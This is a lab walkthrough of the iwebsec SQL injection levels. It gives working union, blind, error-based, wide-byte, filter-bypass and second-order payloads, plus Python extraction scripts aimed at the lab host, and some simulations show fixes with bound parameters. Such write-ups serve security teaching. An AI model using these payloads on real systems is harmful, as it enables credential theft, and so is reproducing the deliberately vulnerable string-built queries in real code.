iwebsec series
SQL injection vulnerabilities
01 - Numeric injection
The normal request here is id=1.
Check whether the parameter is injectable:
?id=2 and 1=1
Determine the number of columns:
?id=2 order by 3
Find which columns are echoed on the page:
?id=-2 union select 1,2,3
Get the current database name:
?id=-2 union select 1,2,database()
Get the table names:
?id=-2 union select 1,2,(select table_name from information_schema.tables where table_schema='iwebsec' limit 0,1)
Get the column names:
?id=-2 union select 1,2,(select column_name from information_schema.columns where table_name='sqli' limit 0,1)
To read the second column name, change limit 0,1 to limit 1,1; for the third, change limit 1,1 to limit 2,1, and so on.
Read the data in those fields: the first user's username and password.
?id=-2 union select 1,2,(select username from iwebsec.sqli limit 0,1)
?id=-2 union select 1,2,(select password from iwebsec.sqli limit 0,1)
02 - String injection
?id=1' --+
No error, so the quote closes the string literal and --+ comments out the rest. Check how many columns there are:
?id=1' order by 3 --+
?id=1' order by 4 --+
order by 3 succeeds and order by 4 errors, so there are three columns. Find the echoed positions:
?id=-1' union select 1,2,3 --+
Get the database name:
?id=-1' union select 1,2,database() --+
Get the table names:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec' --+
Get the column names:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sqli' --+
Get the usernames and passwords (0x7e is ~, used as a separator):
?id=-1' union select 1,2,group_concat(username,0x7e,password) from iwebsec.sqli --+
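The two union-based walkthroughs above (01 and 02) are the same procedure in two quoting contexts. The script below is an added example, not part of the original page or of the iwebsec labs: it automates the three steps (column count via order by, echoed positions via union select markers, then reading a subquery through an echoed column) against a constructed in-memory SQLite table standing in for the MySQL target. sqlite_master replaces information_schema, the "-- " comment replaces --+, and the sample rows are invented.

```python
import sqlite3

# Constructed stand-in for the lab database. The real target is MySQL, so
# information_schema is replaced here by SQLite's sqlite_master and the
# rows are invented sample data.
conn = sqlite3.connect(":memory:")
conn.execute("create table sqli (id integer, username text, password text)")
conn.executemany("insert into sqli values (?, ?, ?)",
                 [(1, "admin", "pass123"), (2, "user", "qwe456")])

def run(sql: str):
    """Execute and render like the lab page: the first row's username and
    password, or None when the query errors or matches nothing."""
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return None if row is None else (row[1], row[2])

def page_numeric(id_param: str):
    """Deliberately vulnerable, as in 01: the parameter is spliced in unquoted."""
    return run(f"select id, username, password from sqli where id={id_param}")

def page_string(id_param: str):
    """Deliberately vulnerable, as in 02: the parameter sits inside single quotes."""
    return run(f"select id, username, password from sqli where id='{id_param}'")

# How each context is broken out of: what closes the original literal and
# what comments out the rest of the original query.
CONTEXTS = {"numeric": ("", ""), "string": ("'", "-- ")}

def find_column_count(page, ctx: str, max_cols: int = 16) -> int:
    """'order by N' step: the first N that errors is one past the column count."""
    close, comment = CONTEXTS[ctx]
    for n in range(1, max_cols + 1):
        if page(f"1{close} order by {n}{comment}") is None:
            return n - 1
    raise RuntimeError("more than max_cols columns")

def find_echo_positions(page, ctx: str, ncols: int) -> list:
    """'union select 1,2,3' step: an id that matches nothing makes the page
    render our row, and the markers that appear are the echoed columns."""
    close, comment = CONTEXTS[ctx]
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    shown = page(f"-1{close} union select {markers}{comment}")
    return [int(v) for v in shown]

def union_dump(page, ctx: str, ncols: int, echo: list, expr: str) -> str:
    """Put a subquery into the first echoed column and read it back."""
    close, comment = CONTEXTS[ctx]
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echo[0] - 1] = f"({expr})"
    shown = page(f"-1{close} union select {','.join(cols)}{comment}")
    return str(shown[0])

if __name__ == "__main__":
    for ctx, page in (("numeric", page_numeric), ("string", page_string)):
        n = find_column_count(page, ctx)
        echo = find_echo_positions(page, ctx, n)
        tables = union_dump(page, ctx, n, echo,
                            "select group_concat(name) from sqlite_master where type='table'")
        creds = union_dump(page, ctx, n, echo,
                           "select username || '~' || password from sqli where id=1")
        print(ctx, n, echo, tables, creds)
```

The only thing that changes between the numeric and string versions is the CONTEXTS entry; everything else, including the order by probe and the marker trick, is shared.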
03 - Boolean-based blind injection
A true condition echoes welcome to iwebsec!!!.
Appending a single quote makes the page echo 1 instead, which shows the injected query broke:
?id=1'
Quoting the value on both sides gives the normal echo again:
?id='1'
The page never shows query results, only whether the query succeeded, so every question has to be asked as a true/false condition. Determine the database name length first:
#encoding=utf-8
import requests

url = "http://www.iwebsec.com:81/sqli/03.php"

def DbLen():
    # the banner is only echoed when the injected condition is true,
    # so the length that prints "welcome to iwebsec!!!" is the real one
    for i in range(1, 20):
        payload = "?id=1 and (length(database())={})--+".format(i)
        req_url = url + payload
        rep = requests.get(url=req_url)
        if "welcome to iwebsec!!!" in rep.text:
            print("DB length is " + str(i))

DbLen()
Get the database name, one character at a time, binary searching the character code with ord(mid(...)):
def DbName():
    result = ""
    for i in range(1, 8):              # the length step above found 7 characters
        l = 32                         # lower bound: first printable ASCII code
        r = 130                        # upper bound (exclusive)
        while l < r:                   # binary search on ord(mid(database(), i, 1))
            mid = (l + r) >> 1
            payload = "?id=1 and ord(mid((select database()),{},1))>{} --+".format(i, mid)
            req_url = url + payload
            print(req_url)
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1            # the character code is above mid
            else:
                r = mid                # the character code is at most mid
        result = result + chr(l)       # loop ends with l == r == the character code
    print("the result is {}".format(result))

DbName()
Get the table names:
def TablesName():
    result = ""
    for i in range(1, 50):
        l = 32
        r = 130
        while l < r:
            mid = (l + r) >> 1
            payload = "?id=1 and ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{} --+".format(i, mid)
            req_url = url + payload
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
        # past the end of the string ord(mid(...)) is 0, every comparison is false
        # and the search settles on 32, so the output is padded with spaces
        result = result + chr(l)
    print("the result is {}".format(result))

TablesName()
Get the column names:
def ColumnsName():
    result = ""
    for i in range(1, 30):
        l = 32
        r = 130
        while l < r:
            mid = (l + r) >> 1
            payload = "?id=1 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} --+".format(i, mid)
            req_url = url + payload
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
        result = result + chr(l)
    print("the result is {}".format(result))

ColumnsName()
Get the usernames and passwords:
def GetData():
    result = ""
    for i in range(1, 200):
        l = 32
        r = 130
        while l < r:
            mid = (l + r) >> 1
            payload = "?id=1 and ord(mid((select group_concat(password,0x7e,username) from iwebsec.sqli),{},1))>{} --+".format(i, mid)
            req_url = url + payload
            rep = requests.get(url=req_url)
            if "welcome to iwebsec!!!" in rep.text:
                l = mid + 1
            else:
                r = mid
        result = result + chr(l)
    print("the result is {}".format(result))

GetData()
04 - Time-based (sleep) injection
Running sqlmap against the parameter identifies it as time-based blind:
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 9858 FROM (SELECT(SLEEP(5)))wyzG)
Time-based injection is still blind injection, but unlike boolean-based blind there is no difference in the response: whether or not the injected condition holds, the page returns its normal content and no error appears. The only usable signal is sleep(): if the response is delayed the condition matched, otherwise it did not.
Determine the database name length:
?id=if(length(database())=7,sleep(1),1)--+
If the database name is 7 characters long, the condition is true and the response is delayed by one second.
#encoding=utf-8
import time
import requests

url = "http://www.iwebsec.com:81/sqli/04.php"

def DbLen():
    for i in range(1, 10):
        payload = "?id=if(length(database())={},sleep(1),1)--+".format(i)
        req_url = url + payload
        start_time = time.time()
        rep = requests.get(url=req_url)
        end_time = time.time()
        t = end_time - start_time
        if t > 1:                      # sleep(1) fired: the guessed length is right
            print("DB length is " + str(i))

DbLen()
Get the database name:
def DbName():
    result = ""
    for i in range(1, 8):
        l = 32
        r = 130
        while l < r:                   # same binary search as in 03, read through the delay
            mid = (l + r) >> 1
            payload = "?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:                  # delayed: the character code is above mid
                l = mid + 1
            else:
                r = mid
        result = result + chr(l)
    print("the result is {}".format(result))

DbName()
Time-based injection has a well-known weakness: on a poor network, latency alone can push a response over the threshold and cause a false positive. Test from a stable network where possible, or raise the sleep() value so that network jitter stays well below it.
Get the table names in the database:
def TablesName():
    result = ""
    for i in range(1, 50):
        l = 32
        r = 130
        while l < r:
            mid = (l + r) >> 1
            payload = "?id=if(ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                l = mid + 1
            else:
                r = mid
        result = result + chr(l)
    print("the result is {}".format(result))

TablesName()
Get the column names:
def ColumnsName():
    result = ""
    for i in range(1, 30):
        l = 32
        r = 130
        while l < r:
            mid = (l + r) >> 1
            payload = "?id=if(ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='sqli'),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                l = mid + 1
            else:
                r = mid
        result = result + chr(l)
    print("the result is {}".format(result))

ColumnsName()
Get the data:
def GetData():
    result = ""
    for i in range(1, 120):
        l = 32
        r = 130
        while l < r:
            mid = (l + r) >> 1
            payload = "?id=if(ord(mid((select group_concat(username,0x7e,password) from iwebsec.sqli),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            print(req_url)
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            if t > 1:
                l = mid + 1
            else:
                r = mid
        result = result + chr(l)
    print("the result is {}".format(result))

GetData()
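Sections 03 and 04 above repeat the same binary search five times each, differing only in how the true/false answer is read. The following is an added example, not code from the page or from the iwebsec labs: it factors that search into one function driven by an oracle and supplies two oracles. The boolean one runs against a constructed SQLite stand-in for the target (SQLite's substr() and unicode() replace MySQL's mid() and ord(); the rows are invented). The time-based one runs against a simulated network whose latency is a deterministic, constructed stand-in for the jitter the section warns about, with no real sleeping, and shows why the single-request "t > 1" rule misfires while a median of several requests against a measured baseline does not. The extractor also stops at the end of the string instead of padding with spaces.

```python
import sqlite3
import statistics

# Constructed stand-in for the lab database. SQLite's substr()/unicode() play
# the role of MySQL's mid()/ord(); the rows are invented.
conn = sqlite3.connect(":memory:")
conn.execute("create table sqli (id integer, username text, password text)")
conn.executemany("insert into sqli values (?, ?, ?)",
                 [(1, "admin", "pass123"), (2, "user", "qwe456")])

def run_vulnerable(id_param: str):
    """Deliberately vulnerable lookup, like 03.php/04.php: id is concatenated, not bound."""
    try:
        return conn.execute(f"select username from sqli where id={id_param}").fetchone()
    except sqlite3.Error:
        return None

def bool_oracle(cond: str) -> bool:
    """03: the banner is echoed only when the injected condition holds."""
    page = "welcome to iwebsec!!!" if run_vulnerable(f"1 and ({cond})-- ") else "1"
    return "welcome to iwebsec!!!" in page

# ---- time-based oracle over a simulated network (nothing really sleeps) ----
SLEEP_S = 1.0      # the sleep(1) the payload asks for
_calls = 0

def reset_network():
    global _calls
    _calls = 0

def timed_request(cond: str) -> float:
    """Simulated ?id=if(cond,sleep(1),1): returns the response time in seconds.
    Latency is a deterministic, constructed stand-in for a jittery link:
    50-130 ms normally, plus a 1.5 s stall on every 7th request."""
    global _calls
    latency = 0.05 + 0.02 * (_calls % 5) + (1.5 if _calls % 7 == 0 else 0.0)
    _calls += 1
    if run_vulnerable(f"1 and ({cond})") is not None:
        latency += SLEEP_S
    return latency

def naive_time_oracle(cond: str) -> bool:
    """The section's rule: one request, 'delayed' if it took longer than sleep()."""
    return timed_request(cond) > SLEEP_S

def median_latency(cond: str, samples: int = 3) -> float:
    return statistics.median(timed_request(cond) for _ in range(samples))

BASELINE = median_latency("1=2")   # calibrate on a condition known to be false

def robust_time_oracle(cond: str) -> bool:
    """Median of several requests against the measured baseline: one stall
    cannot flip the answer, and the threshold sits halfway to sleep()."""
    return median_latency(cond) > BASELINE + SLEEP_S / 2

def extract_string(oracle, expr: str, max_len: int = 64) -> str:
    """The binary search shared by 03 and 04: seven oracle queries per
    character. Stops at the end of the string (unicode('') is NULL, so every
    comparison is false and lo stays 0) instead of padding with spaces."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 128                       # code point lies in [lo, hi)
        while lo < hi:
            mid = (lo + hi) >> 1
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)

if __name__ == "__main__":
    target = "select password from sqli where id=1"
    print("boolean oracle :", extract_string(bool_oracle, target))
    reset_network()
    print("timing oracle  :", extract_string(robust_time_oracle, target))
```

Swapping the oracle is all it takes to move from 03 to 04; the same function would take a real HTTP oracle built from the requests calls in the scripts above. Raising sleep() as the section suggests widens the margin between BASELINE and the threshold, and taking the median of an odd number of samples removes the single stalls that the one-shot rule misreads as a match.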
05 - updatexml (error-based) injection
Error-based injection abuses updatexml(xml_target, xpath_expr, new_xml): when the XPath expression is invalid, MySQL raises an error that quotes the expression, so the data we want is wrapped in concat(0x7e, ..., 0x7e) and comes back inside the error message. The message shows at most 32 characters of the expression, so long results have to be read in pieces with mid() or limit.
Get the database user:
?id=1 and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+
Get the table names in the database (use %23 for # in the URL; a bare # is treated as a fragment by the browser and never sent):
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) %23
Get the column names:
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) %23
Get the usernames and passwords:
?id=1 and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from iwebsec.users),0x7e),1) %23
This uses updatexml(); extractvalue(xml_target, xpath_expr) works the same way with an almost identical payload:
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
The column names and data can be pulled out in the same way by adapting the payloads above.
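The payloads above return a whole group_concat() in one error, which works only while the result fits: MySQL prints at most 32 characters of the offending XPath expression, so anything longer is cut off. The added example below is mine, not the page's or the lab's: it walks a long value in 31-character windows with mid() (31 plus the leading ~ makes the 32 the error shows) and reassembles it from the error text. MySQL is not available offline, so the error format is simulated and the long value is constructed.

```python
import re

# Constructed value standing in for a long query result such as the
# group_concat() of all users; it is longer than the 32 characters MySQL shows.
SECRET = "admin~pass123,user~qwe456,guest~guest2024,dba~Sup3rS3cret!"

def mysql_xpath_error(xpath: str) -> str:
    """Simulates the error MySQL raises for an invalid XPath argument to
    updatexml()/extractvalue(): the message quotes at most 32 characters of it."""
    return f"XPATH syntax error: '{xpath[:32]}'"

def vulnerable_target(start: int, length: int) -> str:
    """Stand-in for what the server does with
    ?id=1 and updatexml(1,concat(0x7e,mid((QUERY),start,length)),1) --+ :
    it evaluates the concat and then fails on the leading '~' (1-based mid())."""
    return mysql_xpath_error("~" + SECRET[start - 1:start - 1 + length])

def build_payload(query: str, start: int, length: int = 31) -> str:
    """The request this section would send for one window of the result."""
    return f"?id=1 and updatexml(1,concat(0x7e,mid(({query}),{start},{length})),1) --+"

ERR_RE = re.compile(r"XPATH syntax error: '~(.*)'$")

def parse_error(text: str) -> str:
    """Pull the injected data back out of the error message."""
    m = ERR_RE.search(text)
    if not m:
        raise ValueError("no XPath error in response: " + text)
    return m.group(1)

def dump_long_value(fetch, window: int = 31) -> str:
    """Walk the value in 31-character windows; a short window means the end."""
    out, start = [], 1
    while True:
        chunk = parse_error(fetch(start, window))
        out.append(chunk)
        if len(chunk) < window:
            return "".join(out)
        start += window

if __name__ == "__main__":
    print("one shot :", parse_error(mysql_xpath_error("~" + SECRET)))   # truncated
    print("windowed :", dump_long_value(vulnerable_target))            # complete
    print(build_payload("select group_concat(username,0x7e,password) from iwebsec.users", 32))
```

Against the real target, fetch would issue build_payload(query, start) over HTTP and hand the response body to parse_error; the window logic stays the same.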
06 - Wide-byte (GBK) injection
Check whether wide-byte injection is possible:
?id=1%df' and 1=2%23
?id=1%df' and 1=1%23
The two responses differ, so wide-byte injection works: the server escapes the quote as \', but with a GBK connection charset the %df byte and the backslash (0x5c) are decoded as one two-byte character, leaving the quote unescaped. Determine the column count:
?id=1%df' order by 4%23
Get the database name:
?id=-1%df' union select 1,2,concat(database())%23
Get the table names:
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
Get the column names.
Note: when querying the column names we cannot use
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sqli'--+
because the quotes around sqli are escaped too and the query errors. Replace the literal with a subquery so that no quotes are needed:
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1)%23
Get the data:
?id=-1%df' union select 1,2,group_concat(username,0x7e,password) from iwebsec.sqli%23
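The escaping flaw behind this section can be reproduced without a database. The added example below is mine, not the page's or the lab's: it models PHP-style byte-wise escaping, splices the result into the query, and decodes the statement the way the server does under two connection charsets. Under GBK the %df byte swallows the backslash and the attacker's quote survives; under UTF-8 it does not. The table name and query shape are the page's; the fix shown (decode first, then escape, which is what a charset-aware escaper or a bound parameter gives you) is mine.

```python
import re

def addslashes(raw: bytes) -> bytes:
    """PHP addslashes()/magic_quotes on raw bytes: a backslash goes in front of
    ' " \\ and NUL. It never looks at the character set, which is the flaw."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # backslash
        out.append(b)
    return bytes(out)

def build_query(id_param: bytes, connection_charset: str) -> str:
    """Escaped bytes are spliced into the SQL, and the server then decodes the
    statement under the connection charset. Under GBK the %df byte and the
    0x5c backslash form one character, so the quote that follows is free."""
    sql = b"select * from sqli where id='" + addslashes(id_param) + b"' limit 1"
    return sql.decode(connection_charset, errors="replace")

def build_query_charset_aware(id_param: bytes, connection_charset: str) -> str:
    """The fix: decode first, then escape on characters (what a charset-aware
    escaper with the right connection charset, or a bound parameter, achieves).
    A lone lead byte can no longer eat the backslash."""
    text = id_param.decode(connection_charset, errors="replace")
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return f"select * from sqli where id='{escaped}' limit 1"

QUOTE_RE = re.compile(r"(?<!\\)'")

def unescaped_quotes(sql: str) -> int:
    """Quotes the SQL parser will treat as string delimiters (an odd count means
    the attacker's quote closed the literal early)."""
    return len(QUOTE_RE.findall(sql))

PAYLOAD = b"1\xdf' and 1=1#"    # the section's ?id=1%df' and 1=1%23 after URL decoding

def compare(payload: bytes = PAYLOAD) -> dict:
    """Same bytes, two connection charsets: the query each one executes and
    how many live quotes it contains."""
    return {cs: (build_query(payload, cs), unescaped_quotes(build_query(payload, cs)))
            for cs in ("gbk", "utf-8")}

if __name__ == "__main__":
    for cs, (sql, n) in compare().items():
        print(f"{cs:6}: {n} live quotes -> {sql}")
    print("fixed :", build_query_charset_aware(PAYLOAD, "gbk"))
```

Three live quotes in the GBK case means the literal was closed after 1運 and the rest of the payload runs as SQL; the 0x7e separator trick and the subquery workaround above both exist because any quote the attacker types is still escaped, only the one after %df is freed.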
07 - Space filtering
The server strips spaces from the input parameter.
Spaces can be replaced with %0a (a newline), /**/ (an empty comment), or parentheses:
?id=-3/**/union/**/select/**/1,2,group_concat(concat(username,0x7e,password))%0afrom/**/iwebsec.users
08 - Case filtering
The server filters lowercase keywords, but MySQL keywords are case-insensitive, so mixed case runs just the same:
?id=-2 unIon sElect 1,2, Group_concat(pasSword,0x7e,usERname) fRom iwebsec.sqli
09 - Double-writing keywords
When a keyword such as select is removed from the input once, write it twice, seleselectct: stripping the inner select leaves a valid select behind:
?id=-1 union seleselectct 1,2,group_concat(username,0x7e,password) from iwebsec.sqli
10 - Double URL encoding bypass
The server URL-decodes the parameter once more before using it, so URL-encoding the injection defeats the WAF's pattern match while the decoded query still executes:
?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users
11 - Hex encoding bypass
Hex literals get around quote filtering, and few WAF rule sets flag them.
Simply write the string iwebsec as a hex literal:
Replace 'iwebsec' with 0x69776562736563
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x69776562736563
12 - Equivalent function and operator substitution
The equals sign is filtered: ?id=1 and 1=1 fails even though the injection point exists,
so replace and 1=1 with and 1>0.
Where = cannot be used, the LIKE predicate can stand in for it.
like '<pattern>' matches rows whose column value matches the pattern; the pattern can be a complete string or contain the wildcards % and _:
%: any string of any length, e.g. a%b matches any string that starts with a and ends with b
_: exactly one character, e.g. a_b matches any three-character string that starts with a and ends with b
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema like 'iwebsec'
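Levels 07 to 12 above are all blacklist filters beaten by a representation gap: the filter inspects one form of the parameter and the SQL parser executes another. The added example below is mine; the lab's PHP filters are not on the page, so these are constructed toy versions of each level. It runs each blocked payload and its bypass from the sections above through the filter model, normalises the result the way the MySQL parser would (comments and newlines as whitespace, case-insensitive keywords) and checks that the bypass still carries the UNION SELECT. It ends with the fix none of the filters give, a bound parameter, demonstrated on SQLite.

```python
import re
import sqlite3
from urllib.parse import unquote

# Toy versions of the blacklist filters in levels 07-12 (constructed here; the
# lab's PHP is not on the page). Each returns the parameter that reaches the
# database, or None when the request is rejected.
def waf_no_space(p):   return None if " " in p else p                                # 07
def waf_lowercase(p):  return None if re.search(r"union|select", p) else p            # 08: case-sensitive
def waf_strip_once(p): return p.replace("select", "")                                # 09: deletes each match once
def waf_pattern(p):    return None if re.search(r"union\s+select", p, re.I) else p    # 10: runs on the raw query string
def waf_no_quote(p):   return None if "'" in p else p                                # 11
def waf_no_equals(p):  return None if "=" in p else p                                # 12

FILTERS = {"07": waf_no_space, "08": waf_lowercase, "09": waf_strip_once,
           "10": waf_pattern, "11": waf_no_quote, "12": waf_no_equals}

def executed_param(level: str, raw: str):
    """What the SQL parser finally sees. PHP URL-decodes the query string once;
    level 10's WAF looks at the still-encoded string, all others at the decoded value."""
    decoded = unquote(raw)
    if level == "10":
        return None if waf_pattern(raw) is None else decoded
    return FILTERS[level](decoded)

def as_mysql_sees_it(param: str) -> str:
    """Normalisation the MySQL parser applies anyway: comments and newlines
    are whitespace, keywords are case-insensitive."""
    return re.sub(r"/\*.*?\*/|\s+", " ", param).lower()

def injection_survives(level: str, raw: str) -> bool:
    param = executed_param(level, raw)
    return param is not None and re.search(r"\bunion select\b", as_mysql_sees_it(param)) is not None

# (level, payload the filter stops, payload from the page that gets through)
CASES = [
    ("07", "-3 union select 1,2,group_concat(username) from iwebsec.users",
           "-3/**/union/**/select/**/1,2,group_concat(concat(username,0x7e,password))%0afrom/**/iwebsec.users"),
    ("08", "-2 union select 1,2,group_concat(password,0x7e,username) from iwebsec.sqli",
           "-2 unIon sElect 1,2, Group_concat(pasSword,0x7e,usERname) fRom iwebsec.sqli"),
    ("09", "-1 union select 1,2,group_concat(username,0x7e,password) from iwebsec.sqli",
           "-1 union seleselectct 1,2,group_concat(username,0x7e,password) from iwebsec.sqli"),
    ("10", "-1 union select 1,2,group_concat(username) from iwebsec.users",
           "-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users"),
    ("11", "-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'",
           "-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x69776562736563"),
    ("12", "-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'",
           "-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema like 'iwebsec'"),
]

# The fix none of these filters provide: bind the value instead of splicing it.
conn = sqlite3.connect(":memory:")
conn.execute("create table sqli (id integer, username text, password text)")
conn.execute("insert into sqli values (1, 'admin', 'pass123')")   # constructed row

def parameterized_lookup(id_param: str):
    """The whole parameter is compared as one value; a non-numeric string simply matches no id."""
    return conn.execute("select username from sqli where id = ?", (id_param,)).fetchone()

if __name__ == "__main__":
    for level, blocked, bypass in CASES:
        print(level, "blocked:", injection_survives(level, blocked), "bypass:", injection_survives(level, bypass))
    print("bound parameter:", parameterized_lookup("-2 unIon sElect 1,2,3"))
```

Every blocked payload and bypass pair differs only in spelling, yet as_mysql_sees_it() maps the bypass back onto the same query; a filter that does not canonicalise exactly as the parser does will always have such a gap, which is why the bound parameter at the end, not a longer blacklist, is the fix.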
13 - Second-order injection
First register an account whose username is the dirty data.
Then request a password reset with e-mail 123; the reset step reads the stored username back and builds
select * from sqli where username='admin'#'
where # comments out everything after it, so the query matches admin.
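The second-order flow above as an added example, not from the page or the lab, on an in-memory SQLite table with invented rows: registration binds its parameters and stores the dirty username harmlessly; the password reset then reads that username back, treats it as trusted and splices it into an UPDATE, which is where the injection fires. SQLite ends comments with -- rather than MySQL's #, so the dirty username here is admin'-- instead of the page's admin'#; the safe version binds the stored value too.

```python
import sqlite3

# Constructed stand-in for the lab table. SQLite comments with '--', where the
# page's MySQL payload uses '#', so the dirty username here ends in "'-- ".
conn = sqlite3.connect(":memory:")
conn.execute("create table sqli (id integer primary key, username text, password text, email text)")
conn.execute("insert into sqli (username, password, email) values ('admin', 'pass123', 'admin@example.test')")

def register(username: str, password: str, email: str) -> None:
    """Step 1, done safely: parameters are bound, so the quote in the username
    is stored as data and nothing happens yet."""
    conn.execute("insert into sqli (username, password, email) values (?, ?, ?)",
                 (username, password, email))

def reset_password(username: str, email: str, new_password: str) -> int:
    """Step 2, deliberately vulnerable: the lookup is bound, but the username read
    back from the database is treated as trusted and spliced into the UPDATE."""
    row = conn.execute("select username from sqli where username = ? and email = ?",
                       (username, email)).fetchone()
    if row is None:
        return 0
    stored = row[0]
    sql = f"update sqli set password='{new_password}' where username='{stored}'"
    return conn.execute(sql).rowcount          # rows changed

def reset_password_safe(username: str, email: str, new_password: str) -> int:
    """The fix: data read from the database is still untrusted input; bind it too."""
    row = conn.execute("select username from sqli where username = ? and email = ?",
                       (username, email)).fetchone()
    if row is None:
        return 0
    return conn.execute("update sqli set password = ? where username = ?",
                        (new_password, row[0])).rowcount

def password_of(username: str):
    row = conn.execute("select password from sqli where username = ?", (username,)).fetchone()
    return None if row is None else row[0]

ATTACKER = "admin'-- "      # the 'dirty data' username; MySQL equivalent: admin'#

if __name__ == "__main__":
    register(ATTACKER, "x", "123")
    reset_password(ATTACKER, "123", "owned")   # runs: ... where username='admin'-- '
    print("admin's password is now:", password_of("admin"))
```

The first query is correct and the second is also "safe" by the usual checklist, because its input came from the database; the vulnerability is in trusting stored data, which is why the fix binds the value again rather than validating it at registration.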